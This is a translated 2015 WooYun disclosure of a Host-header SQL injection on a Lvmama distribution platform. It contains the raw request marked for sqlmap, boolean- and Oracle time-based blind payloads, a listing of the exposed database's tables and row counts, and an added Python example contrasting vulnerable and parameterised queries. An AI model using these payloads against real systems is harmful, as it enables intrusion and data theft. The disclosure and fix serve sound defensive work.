Vulnerability summary

Defect ID: wooyun-2015-0124841

Title: SQL injection via an HTTP header on an important Lvmama (驴妈妈) platform

Vendor: 驴妈妈旅游网 (Lvmama)

Author: 深度安全实验室

Submitted: 2015-07-06 11:39

Fixed: 2015-08-20 13:04

Published: 2015-08-20 13:04

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-07-06: Details sent to the vendor, awaiting vendor handling
2015-07-06: Vendor confirmed; details visible to the vendor only
2015-07-16: Details disclosed to core white hats and domain experts
2015-07-26: Details disclosed to regular white hats
2015-08-05: Details disclosed to intern white hats
2015-08-20: Details disclosed to the public

Brief description:

SQL injection via an HTTP header (Host) on an important Lvmama platform

Detailed description:

http://fenxiao.lvmama.com/


GET / HTTP/1.1
Host: fenxiao.lvmama.com*
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fenxiao.lvmama.com/home/index.jsp
Cookie: JSESSIONID=eS5SEMyyrred
Connection: keep-alive

Injection point: the Host header (the trailing `*` after `fenxiao.lvmama.com` in the request above is the sqlmap custom injection marker, i.e. `sqlmap -r request.txt`).
19 databases were enumerated:

[screenshot 11111.png: sqlmap database listing]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Host (Host)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ
Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: -5437' OR 5236=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(117)||CHR(68)||CHR(106),5) AND 'CZop'='CZop
---
web application technology: Apache
back-end DBMS: Oracle
Database: SAAS0
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| MLOG$_B2B_TICKET_DETAIL | 794489 |
| MLOG$_ROOM_INFO | 739820 |
| SYS_SMS_LOG | 632524 |
| MLOG$_INFO_NEWS | 599452 |
| MLOG$_INFO_TICKET_PRICE | 513239 |
| SITE_IP2 | 403384 |
| MLOG$_INFO_TICKET_RELVIEW | 371299 |
| MLOG$_INFO_HOTEL | 297430 |
| USR_ENTERPRISE_TAG | 279279 |
| MLOG$_SAAS_USER_INFO1 | 250810 |
| SAAS_VIEW_SUB | 220785 |
| CRUEL_CODE_LOG | 211624 |
| USR_VIEW_MSG | 197004 |
| CUST_BALANCE_LOG | 174868 |
| ROOM_INFO | 149771 |
| INFO_BANK_TMP | 126068 |
| INFO_BANK | 117283 |
| MLOG$_USR_VIEW | 102701 |
| MLOG$_INFO_TICKET_COND | 94586 |
| USR_VIEW | 85337 |
| INTERFACE_HOTEL_SET | 68054 |
| INTERFACE_QUNAR_LOG | 67402 |
| USR_VIEW_COPY | 65389 |
| CRUEL_CODE_LIST | 62173 |
| INTERFACE_IMAGECO | 61732 |
| CRUEL_CODE_MESSAGE | 61445 |
| HOTEL_INFO | 60710 |
| MLOG$_INFO_TICKET_DETAIL | 54829 |
| T_LANDMARK | 51918 |
| INTERFACE_FZG_HOTEL | 35793 |
| T_VENUE_SUB | 27718 |
| JP_INFO_FLIGHT | 25133 |
| T_VENUE | 24033 |
| EXPCODE_DETAIL | 23496 |
| INTERFACE_SUPPLY_SYNC_LOG | 17963 |
| CRUEL_CODE_VERIFY | 14197 |
| MLOG$_SAAS_USER_INFO | 13659 |
| MLOG$_USR_VIEW1 | 12552 |
| MLOG$_INFO_TRAVEL | 12419 |
| MLOG$_INFO_TICKET_RELAREA | 12241 |
| TB_RECEIVE_LOG | 12138 |
| BANK_CITYCODE | 11293 |
| AUDIT_INFO | 10611 |
| SAAS_PAY_DRAWMONEY | 8870 |
| TB_CONSUME_CODE | 8680 |
| INFO_AREA | 8416 |
| INFO_AREA_EX | 8389 |
| INTERFACE_HOTEL | 8256 |
| INFO_CAR_TYPE | 7354 |
| MLOG$_INFO_CONDS | 7249 |
| SAAS_USER_INFO_LOG | 5012 |
| INTERFACE_LONG | 4900 |
| USR_VIEW_COLUMN | 4780 |
| USR_MSG | 4164 |
| T_REGIONS_QD | 3891 |
| TEMP_LTJL_AREA_INFO | 3469 |
| ALITRIP_COUNTRY | 3330 |
| TEMP_SYR_AREA_INFO | 3252 |
| T_REGIONS | 3207 |
| INTERFACE_QUNAR_MOVE | 2666 |
| HOTEL_DISTRICT | 2598 |
| SAAS_VAP_ORDER | 2571 |
| MLOG$_INFO_CAR | 2500 |
| SAAS_PAY_DRAWMONEY_LOG | 2480 |
| MLOG$_TB_USR_INFO1 | 2450 |
| SAAS_INFO_AREA | 2247 |
| USR_VIEW_LINK | 2191 |
| INTERFACE_FZG_BIZZONE | 1999 |
| MLOG$_INFO_VISA | 1782 |
| ALITRIP_ROOMTYPE222 | 1189 |
| RECE_PAYMENT_LIST | 1018 |
| TB_USR_INFO | 1007 |
| JP_INFO_AIRPORT | 940 |
| SAAS_ORDER_CHANNEL | 939 |
| USR_VIEW_MSG_HIS | 935 |
| T_REGIONS_SUBWAY | 928 |
| INFO_VISA_SORT | 874 |
| INTERFACE_LLK_CODE | 843 |
| SAAS_USER_INFO | 843 |
| MLOG$_HOTEL_INFO1 | 773 |
| USR_VIEW_NAV | 752 |
| B2C_TAOBAO_LOG | 515 |
| T_VENUE_COUNT | 497 |
| INTERFACE_MTS_LOG | 468 |
| ONLINE_DEBUG_LOG | 457 |
| USR_VIEW_PAGE | 441 |
| INTERFACE_USER_SET | 434 |
| MLOG$_INFO_TICKET_CANCEL | 351 |
| SAAS_PERMISSION | 346 |
| INTERFACE_USER_SET_LOG | 316 |
| SAAS_BUY_LOG | 313 |
| INTERFACE_LUOHUSHAN_LOG | 310 |
| SAAS_AREA_SUB | 307 |
| USR_PAGES | 303 |
| ALITRIP_HOTEL222 | 294 |
| WX_SET | 269 |
| INTERFACE_QUNAR_HOTEL_LOG | 229 |
| JP_INFO_AIRWAYS | 221 |
| T_SPORTTYPE | 213 |
| USR_TAG | 202 |
| MLOG$_HOTEL_DISTRICT1 | 199 |
| SAAS_INFO_SUB | 179 |
| SAAS_PAY_SET | 171 |
| CUST_INFO_GROUP_CHANNEL | 128 |
| SAAS_NEWS | 121 |
| SAAS_SERVICE_ADD_LOG | 116 |
| SYS_MENU | 113 |
| CRUEL_CODE_POS | 103 |
| INTERFACE_QUNAR | 100 |
| HOTEL_BRAND | 97 |
| SMSINTERFACE_SET_LOG | 94 |
| TB_VIEW_INFO | 89 |
| INTERFACE_INFO | 86 |
| EXPCODE_LIST | 82 |
| B2C_TAOBAO_ORDER | 68 |
| SAAS_SERVICE | 58 |
| USR_POWER_AREA | 58 |
| B2C_TAOBAO_PRODUCT | 54 |
| UNIONPAY_TRADE_LOG | 49 |
| B2C_TAOBAO_ORDER_LOG | 40 |
| SAAS_USER_MEMO | 39 |
| CRUEL_CODE_CUST | 36 |
| T_VENUE_RECORD | 35 |
| INTERFACE_MAP | 33 |
| SAAS_ORDER_SOURCE | 33 |
| INTERFACE_TICKET | 32 |
| USR_LOGIN | 32 |
| SYS_CURRENCY_RATE | 25 |
| MLOG$_SAAS_PERMISSION1 | 23 |
| SMS_CONSUME_LOG | 23 |
| SAAS_NEWS_SORT | 19 |
| SAAS_CLUSTER | 17 |
| CRUEL_EXP_LIST | 15 |
| INTERFACE_QUNAR_HOTEL | 15 |
| JP_INFO_PLANE | 15 |
| INTERFACE_IMAGECO_CUST | 11 |
| INTERFACE_LLK_CUST | 10 |
| SAAS_PAY_SERVICE | 10 |
| USR_VIEW_TEMPLATE | 10 |
| SAAS_PAY_PRODUCT_TYPE | 9 |
| SMSINTERFACE_INFO | 9 |
| SAAS_VAP_PRODUCT | 8 |
| SMSINTERFACE_USER_SET | 8 |
| B2C_TAOBAO_NOTIFYRECEIVEMSG | 7 |
| INTERFACE_MEITUAN | 7 |
| MLOG$_INTERFACE_LLK_CUST | 7 |
| MLOG$_USR_ENTERPRISE_TAG | 7 |
| SAAS_PROD_TYPE | 6 |
| SAAS_TABLE_SQL | 6 |
| SAAS_AGENT_INFO | 5 |
| SMS_GETMONEY_LOG | 5 |
| USR_INFO | 5 |
| BAIDU_TICKET_INFO | 4 |
| INTERFACE_MTS | 4 |
| WX_TEMP_INFO | 4 |
| B2B_SETTLE_METHOD | 3 |
| INTERFACE_PIAOGJ | 3 |
| SAAS_MESSAGE_ADDIN | 3 |
| SAAS_MESSAGE_RSS | 3 |
| B2C_TAOBAO_CONFIG | 2 |
| BAIDU_TICKET_VIEW | 2 |
| CRUEL_EXP_CODE | 2 |
| SAAS_NOTICE | 2 |
| TMP_USR_VIEW | 2 |
| UNIONPAY_CONFIG | 2 |
| INTERFACE_PRICE_RULE | 1 |
| MLOG$_INFO_PROD | 1 |
| SAAS_MONITORING | 1 |
| T_VENUE_PRICE | 1 |
+-----------------------------+---------+


Not going any deeper than this.

Proof of vulnerability:

Fix recommendation:
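The report leaves this section empty. The example below is added by the editor and is not code from the original report or from Lvmama; it reconstructs the likely pattern behind a Host-header injection on a multi-tenant SaaS platform (tenant looked up by hostname) and shows the fix. The table name `site`, its columns, and the use of SQLite instead of the real Oracle backend are assumptions made so the example runs offline; the two payloads are the true/false pair sqlmap reported on this page, and the check mirrors what sqlmap's boolean-based blind test does: compare the response to a condition that is true with one that is false.

```python
import re
import sqlite3

# Constructed, hypothetical schema: a multi-tenant site table keyed by hostname.
# The real SAAS0 schema is unknown; only table names appeared in the report.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE site (domain TEXT PRIMARY KEY, tenant_id INTEGER)")
    conn.executemany(
        "INSERT INTO site VALUES (?, ?)",
        [("fenxiao.lvmama.com", 1), ("other.example", 2)],
    )
    conn.commit()
    return conn


def lookup_tenant_vulnerable(conn, host):
    # The raw Host header is spliced into the SQL text. A single quote in it
    # closes the literal and everything after it becomes part of the WHERE clause,
    # exactly what the payload "fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ" relies on.
    sql = "SELECT tenant_id FROM site WHERE domain = '%s'" % host
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


# Syntactic host[:port] check: letters, digits, dots and hyphens only.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}(:\d{1,5})?$")


def lookup_tenant_safe(conn, host):
    # Defence in depth: reject anything that is not a plausible hostname before
    # it reaches the database, and bind the value instead of concatenating it.
    # Either measure alone stops this injection; use both.
    if not HOSTNAME_RE.match(host):
        return None
    row = conn.execute(
        "SELECT tenant_id FROM site WHERE domain = ?", (host,)
    ).fetchone()
    return row[0] if row else None


# True/false payload pair, the same shape sqlmap reported for this target.
TRUE_PAYLOAD = "fenxiao.lvmama.com' AND 4081=4081 AND 'UwgJ'='UwgJ"
FALSE_PAYLOAD = "fenxiao.lvmama.com' AND 4081=4082 AND 'UwgJ'='UwgJ"


def boolean_blind_check(lookup, conn):
    """Return True when the lookup answers differently for the true and false
    payloads, i.e. the database is evaluating the injected condition."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup injectable:", boolean_blind_check(lookup_tenant_vulnerable, db))
    print("safe lookup injectable:", boolean_blind_check(lookup_tenant_safe, db))
```

With the vulnerable lookup the true payload returns tenant 1 and the false payload returns nothing, which is the observable difference a blind attacker (or sqlmap) uses to read the database one bit at a time; the time-based `DBMS_PIPE.RECEIVE_MESSAGE` payload on this page works the same way with a delay instead of a row. The parameterised lookup returns nothing for both payloads, so the check reports no injection, while a legitimate Host value still resolves.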

Copyright notice: please credit 深度安全实验室@乌云 when reposting.


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-07-06 13:03

Vendor comment:

Thanks

Latest status:

None